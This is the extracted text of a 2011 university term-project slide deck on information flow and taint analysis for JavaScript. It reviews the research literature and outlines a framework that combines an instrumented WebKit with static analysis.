javascript information flow analysis

Fall, 2011 - Privacy&Security - Virginia Tech – Computer Science

Click to edit Master title style

JavaScript Information Flow Analysis

Shiyi WeiCS6204 term project



2Fall, 2011 - Privacy&Security - Virginia Tech – Computer Science

Project motivationLiterature review

Paper orgnization Selected papers Observations

Framework overviewAnalysis componentsOn-going work & conclusion

Overview




Project Motivation

Jif: Java information flow Type-based approach• Language extension• Imprecise

Java programming language• Static typing• Class hierarchy




Information flow analysis for JavaScript Type-based approach works?• Dynamic typing

Challenges• Dynamic language features

– Prototyping– Dynamic code generation– Variadic functions– Fields

• Benchmark

Project Motivation




Paper categories Information flow analysis for C, C++, and Java Analyzing dynamic languages• Performance• Correctness

Security analysis of JavaScript• Static analysis• Dynamic analysis

Literature Review




GATEKEEPER[1] JavaScript widget JavaScriptSAFE

• Static JavaScriptGK

• Dynamic

Literature Review

References[1] S. Guarnieri, and B. Livshits. GATEKEEPER: mostly static enforcement of security and reliability policies for JavaScript code. In proceedings of the 18th conference on USENIX security symposium(2009), pp. 151-168




Staged information flow for JavaScript[2] Integrity policy• The code loaded at any eval site must not into the value

of document.location Confidential policy• The value of document.cookie must not flow into any

variable within the code loaded at any eval site Staged information flow• Stage 1: Compute policy• Stage 2: Check policy

Literature Review

References[2] R. Chugh, J. A. Meister, R. Jhala, and S. Lerner. Staged information flow for JavaScript. In proceedings of the 2009 ACM SIGPLAN conference on Programming Language Design and Implementation




JavaScript taint analysis[3] Prototypes

Object creations

Reflective property accesses Lexical scoping

Literature Review

References[3] S. Guarnieri, M. Pistoia, O. Tripp, J. Dolby, S. Teilhet, R. Berg. Saving the world wide web from vulnerable JavaScript. In proceedings of the 2011 International Symposium on Software Testing and Analysis.




Observations Handle limited language features• Prototype[2, 4]• Properties deletion• eval

Experimental design• JavaScript benchmark not representative[5]

Literature Review

References[4] A. Guha, S. Krishnamurthi, and T. Jim. Using static analysis for ajax intrusion detection. In Internation Conference on World Wide World(WWW), 2009[5] G. Richards, S. Lebresne, B. Burg, J. Vitek. An analysis of the dynamic behavior of JavaScript programs. In proceedings of the 2010 ACM SIGPLAN conference on Programming Language Design and Implementation.




Framework Overview

Instrumented WebKit

Call graph + dynamically generated code

Website source

Static analysis Infrastructure




Instrumented WebKit TracingSafari[5] Instrumented code• Function calls

– Method signature– Arguments

• Object creation sites• Dynamically generated code

– Eval– document.write– etc.

Analysis Components




Static Infrastructure WALA• IBM T.J. Watson Libraries for Analysis

Extract JavaScript code• From web site source

Import dynamic information• Dynamic call graph• Dynamically generated code

Analysis Components




Static infrastructure Handle JavaScript language features

• Variadic functions– Method definitions + arguments– Pruning with argument.length– twitter.com, amazon.com, msn.com, …

• Dynamic code generation

Analysis Components

1. function F(a, b)2. {3. if(arguments.length =1)4. {…}5. else if(arguments.length =2)6. {…}7. else if (arguments.length >= 3)8. {…}9. }




On-going work Information flow algorithm Benchmark Handle other language features

• Prototyping, etcConclusion

Literature review• JavaScript Information flow is hard

– Dynamic language features

Blended approach• Works on unsolved issues

On-going Work & Conclusion

javascript information flow analysis

Documents